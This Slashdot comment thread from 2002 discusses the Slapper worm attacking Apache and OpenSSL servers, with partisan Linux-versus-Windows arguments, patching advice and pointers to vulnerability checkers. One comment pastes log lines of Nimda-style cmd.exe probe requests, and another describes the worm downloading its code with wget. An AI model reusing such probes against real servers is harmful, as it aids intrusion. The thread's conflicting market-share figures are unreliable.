Unfortunately, to keep a system properly up-to-date, it is often necessary to compile packages from source... ON the target machine, in order to get all the pieces in place, because the Makefiles provided ass-u-me a local development environment.
Our main web server got hit this month. The compiler environment was installed because one of the packages we use needed updating. There was no current RPM for it, and several of the features we needed weren't compiled into the RPM versions that are available.
The Makefile provided refused to work when I copied the source/executable tree from our development machine to the production box, because it required tools in the gcc package. To install those particular tools meant installing enough of gcc to let the worm do its damage...
Who do we hand the "Stupid" sign to in this case? Once you install things with RPM, it is sometimes a PITA to get them uninstalled, because of suddenly-discovered dependencies...
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Re:The Worm
by
Anonymous Coward
·
· Score: 1, Funny
I find it terribly amusing that you find this terribly amusing. Why so much interest? Did your solitaire game blue screen?
You ask why so much interest. Could you perhaps be more specific? Why so much interest in open-source, or worms, or the ever-prevalent hypocritical comments that are made by a few ignorant people claiming to be on the side of open-source?
In response to your second question (did my solitaire game blue-screen): No, it didn't. It hasn't since I upgraded from 98 to 2000 and later from 2000 to XP.
As for being fixed long ago... MS releases patches as well, and many times the worms propogate because of many sysadmin's who don't apply said patches -- this is a similar case.
Yes, two or three minor worms in an optional component of an open source server are certainly as big a deal as the literally thousands of virii/security holes/etc in the fundamental core of Windows. The several thousand servers that have been infected with Slapper.b/c certainly compare in scope to the hundreds of thousands, if not millions, affected by Code Red/Nimda/I Love You/etc.
Re:The Worm
by
chrysrobyn
·
· Score: 5, Insightful
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Re:The Worm
by
Anonymous Coward
·
· Score: 1, Insightful
What I find amusing is that this is called a "Linux Worm" when in reality, it's an Apache+SSL problem, NOT a problem with Linux itself.
You cannot compare this to Windows holes, which are usually actual flaws with Windows (since Microsoft is so hell-bent on "integrating" everything with the operating system).
'Do you know how much you're hurting the open-source movement? Please stop.'
I don't think I've *ever* heard anyone say that - certainly not at the local LUG meetings or amongst other fellow users in the area. Maybe it's a Michigan thing, but I can not ever recall hearing or reading comments like that.
What I find terribly amusing is your lack of knowledge. Patch is more than one month old.
This virus is not hurting Linux comunity. It just shows that there's too few holes for virus writers to be original. Last 3 viruses where using the same one hole. That's more promoting than demoting.
Well, for bad admins. I fell it's ok if they get infected. And for users, they don't have web server, but if they have, they should click Update icon sometimes.
-- Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Hardly. The inability to properly admin a system is biting them in the ass. The comments to Microsoft sucking when it comes to security still apply. When someone says that Linux is more secure than Windows, that is not saying it is perfect. Nobody in their right mind would say that any OS is totally secure. The difference is, it is a Linux community. People who find exploits should alert the community before releasing the information in the wild. The same applies to Windows, Microsoft should be alerted to the problem well before everyone else is. The difference is, the Open Source community will quickly patch it, Microsoft will do whatever they want to do.
There is nothing wrong with yelling at people about keeping their systems up to date. It is just bad practice to not keep up with patches. With Open Source, you can do that - with Windows, you can only do that if Microsoft provides you with patches. The OSS community has absolutely no say in how MS decides to handle vulnerabilities, but we do have a voice in our own community.
And if you think a worm or two means that now Linux is catching up to MS in the number of vulnerabilities, you are living in a dream world. Plagued? Please. At least the OSS community isn't delusional and says "there are no bugs".
--
My beliefs do not require that you agree with them.
We'll see how much of a plague it is a year from now. I'm still getting attacked by Nimda and Sircam several hundred times a day. I've seen almost no Slapper attacks. If I'm seeing several hundred Slapper attacks this time next year, then I'll call it a plague.
-- To Do:
1. Take over world
2. Pick up Milk and Bread on the way home
The problem I have with windows is it doesn't give me the same level of flexibility as unix systems. If a bug is found, I can patch the system remotely or ssh in the box and shut stuff down. On windows my options are limited. Even things like file ownership and permissions is hobbled in XP. In win XP pro, you have to boot to safe mode to change drive/file security properties. Say there a patch for windows and I want to patch it remotely because I'm away from home for a week. How the heck am I supposed to patch a windows system?
With unix, I can ssh in, d/l the patch, apply, restart the service(not the machine) and log out. It's good that security in XP home edition doesn't give normal users the ability to change ownership and file permissions, but for XP Pro why in the world can't I access those features without rebooting to safe mode without network connection? I suppose one could reboot to safe mode with network enabled, but I haven't figured out how to do that remotely. There should be the equivalent of Sudo in windows for remote administration. These are my opinions right or wrong. But there are functional differences in security.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Yus! Please begin your OpenBSD bashing at this time.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones.
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Maybe the Slashdot community does. But let's face it -- in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et. al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago. Interesting, too, to note the (huge generalisation) often calm and mature reaction versus the yelling and screaming and chest-beating reaction of the "see-we-really-are-better-than-you-nyah-nyah-nyah" crowd (/huge generalisation).
If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
Also, come the 2.6 kernel, and pluggable security modules, installing stack protectors and tiered security models will be more commonplace and a lot of the stupid holes that have allowed these attacks will simply go away.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Granted these particular worms would not have cared, but there have been many remote root exploits that happened only because a daemon needed to be root to create a low port or perform raw protocol manipulation.
Open any folder window. Tools menu, folder options, view tab, the last option in the advanced box ("Simple file sharing") - uncheck that. You'll get your real sharing and permissions tabs back.
Whoops, guess I spoke too soon. CERT revised their warning.
>> Note: Based on initial reports received by the CERT/CC, earlier versions of this Advisory mentioned other SSL error messages that might be logged on potentially vulnerable hosts. On further analysis, we have concluded that these log messages were unrelated to the the Apache/mod_ssl worm.
It doesn't seem to show up in the logs as anything out of the ordinary.
-- To Do:
1. Take over world
2. Pick up Milk and Bread on the way home
What's even worse is Windrones who've had their feelings hurt so many times by Linux geeks getting all puffed up because *one* virus comes along every blue moon targeted at Linux boxen. This is hardly a "plague", unlike the seemingly constant attacks against *other* platforms.
My statement:Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
Kiwimate:I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
If I have misinterpreted CTRamsden's original intent of the statement that, [when faced with vulnerabilities, the open-source community responded with] "Windows still sux..." [paraphrasing, hopefully not too liberally], please forgive me, and I will ask for kiwimate to accept my thanks for pointing out a misinterpretation.
I have seen too many people equate the vocal non-coding, quick to criticise Microsoft Slashdot subgroup as characteristic of the entire open source movement. I think it's very important to remember and recognize that those people are out there -- but equally important to understand that others are out there who accept criticism as constructive.
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Just because those are the posts you see doesn't mean everyone thinks this. I, for one, admit to not always being as vigilent as I would like to be. There are many things to attend to, so you can't be on top of everything, but we all know that you only have yourself to blame if you miss something important. The dynamics of the community help a lot, so it isn't as big of a problem. The second point helps a lot, and the way MS hides their bugs just makes it harder even if you do everythng you can.
> If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
There are many roles in the community, not everyone has to spend all their time chasing bugs to contribute. In fact, it would be a duplication of efforts, and not really useful. Using the code is an important role too, and your responsibility there is to give feedback without annoying the developers while they work. Also, keep in mind that many are scratching their own itch on another project, so they leave this to the domain experts.
> Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
You missed his point here completely. The original poster did say "Linux is as bad as Windows", which is patently false. He was just saying that not everyone can refute this statement with a cogent argument. Many can, and he did above.
Why would anyone bother arguing against Windows when it's so simple to argue FOR Linux...
On the 11 servers I run I'm averaging 141 days of uptime with a high of 258 days and a low of 25 days. What more needs to be said?
Re:The Worm
by
Anonymous Coward
·
· Score: 0
Yes. Win XP. Automatic updates.
Even Automatic random reboots for your bastards who don't reboot after applying those patches.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Yeah! I've been waiting for that one for years! Connecting to the internet just *shouldn't* require access to root!
--
I think we've pushed this "anyone can grow up to be president" thing too far.
That worked. thanks for the tip. Man, you don't how much time I wasted trying to figure out how to get the win2K folder security options back. I even tried help, which didn't help at all. Why in the world I had to waste over 20 hours looking for a way to do a simple thing really isn't an improvement over win2K in my mind. In unix, all I have to do is do "man ls". Now if windows help was more helpful and gave me that info the first time I searched for security options, it would be a real improvement.
The windows worms (nimda et al) got ADMINISTRATIVE privileges IMMEDIATELY upon launching the attack. This says something about security I think.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
"Flamebait"?!? What justifies this?
Moderators on crack, AGAIN.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
I find it terribly amusing how wildly inaccurate pro-MS posts such as yours always get moderated so highly. Since you undoubtedly logged in with IE on Win, click that little 'windows update' icon under the start button and count how many security patches for your OS were released in the last two months. No real comparison with linux, is there?
Re:The Worm
by
Anonymous Coward
·
· Score: 0
upgrading from 2000 to XP is like saying "I upgraded from default to jungle icons (and installed after dark screen savers.)
Re:The Worm
by
Anonymous Coward
·
· Score: 0
Once again Windows users confuse the number of security exploits with the severity of the exploit. A windows security problem has multiple paths of entry and multiple paths of infection as it spreads throughout the whole Microsoft Forest. This slapper worm ONLY affects linux systems running Apache and openSSL. As opposed to any Worm for Windows(you choose the flavor) this worm does not spread throughout the network like a case of smallpox passing through an uninoculated population.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
The replacement for sudo is runas - to, for example, start a shell under an Admin account, do "runas/user:domain\account cmd.exe". Type runas/? at a command prompt for the full skinny
As for remotely accessing your boxen, you can either telnet to them (unlike many telnets, W2K and WXP use challenge/response authentication, so you're not passing plaintext passwords over the wire) or connect using Terminal Services (called Remote Desktop in WinXP). Or, if you want to SSH into them, use one of the many SSH-on-NT implementations - I like PuTTY
So yes, your opinions are wrong. Dare I say it... RTFM:-)
A missed chance for some bad humor
by
shren
·
· Score: 2, Redundant
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
-- Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
Re:A missed chance for some bad humor
by
Anonymous Coward
·
· Score: 0
well, at least the writer of the worm keeps his Source OPEN !!
is that what OSS is all about!
The most important thing to point out is ...
by
matjac
·
· Score: 1
"Of course, by the time you read this, the bug will have been patched.;)"
This is the most significant benefit (to me atleast). In fact, I think that to most people, the biggest of open source is the rapid deployment of bug fixes, patches etc. rather than cheap or free software. Without open source, I'm afraid most of us would be stuck in a world of buggy software that only works when it feels like it.
Oh Wait a minute... What? "Windows has encounterd a problem..."
Anyway, the point is that I have never heard of MS, Oracle, or any of the other major software companies ever having a patch within hours much less days for anything.
Re:The most important thing to point out is ...
by
stinky+wizzleteats
·
· Score: 2
Having a patch in a few hours isnt all that impressive - its nice, but in effect - its not that useful.
I suppose it's more useful to be subject to the delays of what the commercial sfw industry calls "accepted vulnerability reporting practices" - which means we'll let you and your systems remain vulnerable for months while we:
Do a cost benefit analysis to derive the date at which it is more expensive to us to allow the problem to remain unpatched than to fix it.
Forward the results of the above analysis a schedule for the patch devel group so they can work on a patch.
Coordinate with other devel groups, legal, and marketing to determine what competitive inhibition (breaking Netscape, Novell, Samba, etc.), new DRM measures, EULA changes, and other related stuff should be released with the patch.
people are wary of installing untested patches
I have all of my Linux systems on automatic update, and I've never once had a problem with a patch. I've also never had to accept a new EULA, never had icons I'd previously deleted return to my desktop, nor had third party software suddenly fail to work following a system update.
CERT Advisory
by
Anonymous Coward
·
· Score: 5, Informative
A spacious analogy.
by
Lethyos
·
· Score: 2, Insightful
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase it's security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault.
No, exploiting a vulnerability is the same thing as an alarm system and safe lock expert breaking into the bank in the middle of the night.
"Exploiting" an open door is comparable to deleting files on anonymous FTP, even if you cam do it (stupid admin), it doesn't mean that you are right if you destroy other people's data.
Surely a failure of a security system could also be regarded as a failure of the humans who designed it.
Re:A spacious analogy.
by
Anonymous Coward
·
· Score: 0
Whether the designers failed is dependent upon the purpose and limitations of the design. Most banks are not designed to withstand nuclear detonations, repeated use of precision explosives, week-long use of construction or military equipment...nor denial-of-service attacks ("They welded the vault SHUT and collapsed the building?").
But then, most bank vaults contain a little cash and the safety deposit boxes -- the bank's millions are stored in the account books of regional banking services. So few banks have to withstand attacks which cost millions of dollars because thieves with millions of dollars know it would be a waste of money.
what does it look like?
by
Anonymous Coward
·
· Score: 5, Interesting
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
See earlier post and use the latest chkrootkit. It's that easy to check.
Re:what does it look like?
by
EkiM+in+De
·
· Score: 2, Informative
Well I'm not entirely sure but I found that in my error_log a couple of bad hits from other Apache Servers. I found the Apache Test page on these servers which I suspect is a bit of a giveaway that perhaps these are not active servers. Anyway I could be completely wrong, but since these hits were from Web servers I kind of suspect that these servers have not been patched.... God I hope that the log entries below don't indicate that I've been hit and damaged
Anyway the hits looked like this:
You'll only get that file if you're vulnerable. If you're up to date on patches, you won't see anything in/tmp (other than files that should be there).
Re:what does it look like?
by
KMitchell
·
· Score: 5, Informative
You'll get some additional stuff in your access log and potentially error log but the telltale sign that (on a patched system) someone is pinging you for the exploit is something like this in your ssl_error_log:
Thought I'd check mine, nothing like that, just the usual junk...
[Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist:/usr/local/httpd/htdocs/c/winnt/system32/cmd.exe [Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist:/usr/local/httpd/htdocs/d/winnt/system32/cmd.exe Thanks Bill!
--
----
Den ene knappen er powerknapp, den andre er Bender voice knapp "Bite My Shiny Metal Ass"
Re:what does it look like?
by
Anonymous Coward
·
· Score: 0
what about this? my ssl_engine_log is full of this stuff...
[25/Sep/2002 09:21:36 07428] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:36 07427] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:36 06953] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:36 06950] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:36 07268] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:36 07269] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:37 07429] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:37 07436] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:37 07261] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] [25/Sep/2002 09:21:55 07255] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
Yeah, in my logs that stuff is from the same IPs that there's then the buffer overflow attempt from. Unfortunately, those spurious handshakes also create a short-term DOS situation - they keep Apache awfully busy. Has anyone come up with a way to block the spurious attempts with, say, iptables, while keeping legitimate 443 service open?
-- "with their freedom lost all virtue lose" - Milton
Re:what does it look like?
by
Secure42
·
· Score: 1
I am also getting the same logs:
[error] OpenSSL: error:1406B458:lib(20):func(107):reason(1112)
Re:Where's all the yammering now?
by
Anonymous Coward
·
· Score: 0
I guess not even open source solutions can cure lazy admin syndrome, eh?
When was it stated that it would?
Re:The bite
by
Anonymous Coward
·
· Score: 0
So, did the bite hurt, ass?
It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 5, Insightful
The problem is that many (most? all?) the big-name
distros have Apache built with mod_ssl on them. Even
though I would guess that only a tiny percent
of all web servers need SSL. (Admittedly that
tiny percent is very important, as no money
transactions should be going on without security...)
IMHO if you need SSL on a webserver, you should
be forced to go through the download + build +
cert process yourself.
Re:It's a distro problem, not a linux problem
by
Hard_Code
·
· Score: 2
"IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself."
At some point you have to unless you want to run with a phony snakeoil cert.
Apple Computer, Inc. The vulnerability described in this report has been addressed by
* Security Update 2002-08-23 for Mac OS X 10.2 (Jaguar), and by * Security Update 2002-08-02 for Mac OS X 10.1.5.
--
How sleepless is the egg, knowing that which throws the stone forsees the bone.
Re:It's a distro problem, not a linux problem
by
glesga_kiss
·
· Score: 1
Even though I would guess that only a tiny percent of all web servers need SSL
I use SSL for everything, even if it's just streaming my own private collection of mp3 from my web server. E-mail? IMAP over SSL. Remote access? VNC over SSH.
Why would you not want to encrypt everything is beyond me...
Re:It's a distro problem, not a linux problem
by
tialaramex
·
· Score: 2
There's nothing phony about self-certification. Since Verisign and other companies in the CA business don't actually do any useful checks or offer a reliable revocation method, you are just saving everyone involved money. If they/really/ want to be sure you're the real deal they will use out of band methods to verify the fingerprint. Yeah, right.
After all >90% of Windows users went for years without a working CA validation check in their crypto subsystem, so without manually opening and verifying the cert they couldn't tell if it was signed by a real CA anyway.
SSL is provably effective against passive snooping, and has some deterrent value against people with low motivation and minimal resources (e.g. script kiddies) but if you think buying a cheap-ass Verisign cert protects you against black hats then you're just another Voodoo security guy.
Re:It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 2
Why would you not want to encrypt everything is beyond me...
I certainly use it for passwords and anything
with any possible financial impact. But I
don't see the purpose of doing it for much else.
Maybe it's just a habit I picked up from reading
all those crypto books in grade school, but it's
well known that the greater the number of
intercepts, the easier it'll be for someone to
crack a code. Not that I believe those numbers
are anything but zero for 128-bit encryption:-)
How to test yourself
by
pbur
·
· Score: 5, Informative
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
http://cert.uni-stuttgart.de/advisories/openssl- ss lv2-master/openssl-sslv2-master.c
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Ok,/. put an extra space in the URL after "openssl-ss". I will make a link URL:
The Link
Re:How to test yourself
by
jooniqzb1tch
·
· Score: 3, Informative
be sure to check your sendmail as well if you're using TLS,possibly stunnel and any other ssl enabled server you run.. (well it does not check ssh). I had patched apache immediately but this tool made me realise I had forgotten about sendmail:)
Re:How to test yourself
by
Anonymous Coward
·
· Score: 0
A static compile compiles the code into the Apache binary. A shared module compile compiles the code into the module, and when the module is needed it is loaded into the Apache binary. The key word here is compile, everything is already compiled from the source. Nothing is ever loaded from the SSL library, over the inital compile.
I can do everything virtually in Linux what I can do in Windows.
Theres only little in the field of capturing/encoding divx movies and graphical download managers, but I might be wrong there since I havent bothered to look.
I also have to give a lecture on the slapper worm in a couple weeks and I havent really started my presentation notes:(
Wish me LUCK!
Keep your anti virus software up to date also....
by
HeyZuess
·
· Score: 1
I find it somewhat odd that each advisory from an anti-virus vendor concerning the slapper worm advises to not only patch your software, but also keep your antivirus software current.
If the software is patched then antivirus software is irrelevent.
How big is the antivirus software market for linux?
We're not really catching up
by
Anonymous Coward
·
· Score: 5, Insightful
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0, Troll
Since linux only holds about 10% of the market, i would look at this as pretty equal...
"opensource is so great"... get a life. Go find a driver for your video card.
Re:We're not really catching up
by
catfood
·
· Score: 5, Insightful
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:We're not really catching up
by
rindeee
·
· Score: 2, Informative
10% of what market you genius? The sector that matters here is machines with direct connection to the Internet. In that sector, Linux outnumbers Windows boxes by a strong (about 3.5 to 1 according to latest Netcraft stats giving Linux/Apache around 60% market share). Me thinks an "Introduction to Elementary Statistics" is in order my friend.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
> It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude.
The operative word is "seems", but the structure of my sentence may have made my meaning unclear. I am basing my opinion on the fact that Code Red infected 40 times as many systems as Slapper has within the same period of time at a time when ~40% of web sites were hosted on Linux and ~25% were hosted on a Windows platform.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
if you knew what the fuck you were talking about you would know you dont need a video card for youre server. moron
Re:We're not really catching up
by
essdodson
·
· Score: 1
Did you forget that MS patched the bugs exploited by Codered 18 months prior to codered's birth? If you want to place blame, blame the folks running those machines.
-- scott
Re:We're not really catching up
by
micromoog
·
· Score: 2
Upon reading this outrageously unlikely claim, I did a bit of looking. I assume you're getting your numbers from here.
Apache, unsuprisingly, has a large market share, but no mention of OS . . . you're not assuming all of these Apache servers are running on Linux boxes, are you?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Check out microsoft.public.* on usenet. Just about every Windows admin with a clue is tired of MS's crappy security record.
You have it backwards. Just about every Windows admin with a clue has figured out a way to automate the patch process to make his or her job easier. Where I work, when a new patch comes out, I stick it in an Active Directory GPO created specifically for this purpose so that on the next system bootup, the patch is installed, system is rebooted, and hfnetchk.exe runs to create a log file detailing success/failure. Takes a whole morning to push the patch to ~225 desktops and it wouldn't even take that long if everyone would get to work on time. Then I get to spend the rest of my time posting on/. on how wrong you clueless Linux users are about the state of the Windows world.
Re:We're not really catching up
by
bozone
·
· Score: 1
Just about every Windows admin with a clue is tired of MS's crappy security record
if only the admins were the decision makers instead of the phbs..
-- "Hatred is the coward's revenge for being intimidated"...George Bernard Shaw
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
And thanks to posts like this we're beginning to catch up in the field of "Issuing obvious BS in the hope of downplaying a real security vulnerability"
Re:We're not really catching up
by
sehryan
·
· Score: 2
And you know what? A patch was available to MS systems before Code Red starting really moving. I was pushing my administrator to do it. He didn't feel it was necessary. A couple of days later we get hit, and he spends the next days and nights trying to stop the spread and recover.
Code Red exists because of crap MS security. Code Red spread because of crap Administrators.
-- The world moves for love. It kneels before it in awe.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
> Since linux only holds about 10% of the market, i would look at this as pretty equal...
You really don't know what are you talking about. Linux has a share of around 3%. However apache that runs mostly on linux has a share of around 60% on web servers. This bug affects only around 10% of those servers (those that supports SSL). Now Microsoft has around 30% among web servers. And it has bugs that affected all 100% of his web servers. Now image 6% -> one exploit, 60-6 -> none exploit, 30% -> few exploits. Time frame: one year.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
How can such a moron be modded as Insightful. What does the number of websites have to do with the spread of the virus. There are hosts with one server running thousands of sites. If this guy wasn't an absolute moron he would do the research and find on netcraft that around 50% of all webservers run Windows (whether IIS or Apache). Linux is actually a distant second with around 30%.
Re:We're not really catching up
by
Dalcius
·
· Score: 2
While the parent of your message was not correct (I don't think?), 27% of all servers today ship with Linux. And that doesn't include those that are being converted from Unix / Windows that were already owned.
10%? *bzzt* Try again.
-- ~Dalcius Rome wasn't burnt in a day.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
Umm, wrong. Slapper may be a minor event when you compare numbers to other worm infections, but it is a major event when it comes to poking a hole in the myth of Linux/Unix invulnerability. We've all heard too many times how Linux is more secure and how the admins are more knowledgeable and on top of their game while Windows admins tried to argue that things might be different if crackers actually targeted Linux boxen. Well, now apparently someone *is* targeting Linux/Unix servers and that means you're going to have those Windows admins coming back to give the technical equivalent of "neener neener, I told ya so". Just grow up and deal with it and stop making justifications for the sorry admins that allowed this worm to spread after a fix had been made available.
What do you expect from Windows, though, when its target market is people who don't know how to use computers.
What do you expect from Linux, though, when its target market is leetist, smug assholes.
Re:We're not really catching up
by
rindeee
·
· Score: 1
I am not "assuming" anything. Dig a bit deeper my friend and look at the OS platform statistics, not the web server survey. Look at Apache's own platform statistics. Outrageously unlikely? Really?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Oh, well. Sorry about that then. We would probably be using SUS as well if we didn't already have our own system in place when it was released.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Apache and Windows are not mutually exclusive. Most webservers are indeed Windows boxes, and a good number of them run Apache. While Apache owns the WebServer market, Linux does not.
10% of what market you genius? The sector that matters here is machines with direct connection to the Internet. In that sector, Linux outnumbers Windows boxes by a strong (about 3.5 to 1 according to latest Netcraft stats giving Linux/Apache around 60% market share). Me thinks an "Introduction to Elementary Statistics" is in order my friend.
I'm assuming you mean Unix/Apache, because Netcraft doesn't list OSs in their survey. The last datum I heard for Linux was around 15% of the server market, with Windoze taking up 30%-35%, and Unix the rest.
Re:We're not really catching up
by
PyroX_Pro
·
· Score: 0
Well, look at that, it found ALL of my hardware right away, I didn't even have to go to any vender websites to get the drivers. Is this heaven? No fool, its Linux. Its becoming easier and easier to install, unless you use some homemade hardware with parts you bought from radio shack.
When was the last time you did anything without using Microsoft products? That is the better point. Stop waiving your flag of corporate America approval for a monopolistic company,
To me, its harder to setup my video card under windows, WTF man, you think windows locates, and installs my G-Force drivers for me? hell no! I have to go out to NVidia's website and locate them.
The worm is attacking SSL, which is connected to Apache, which holds 80% of all your craptastic websites, it is far from equal.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
system is rebooted
Good thing your server is not used much and you can afford to shut it down willy-nilly.
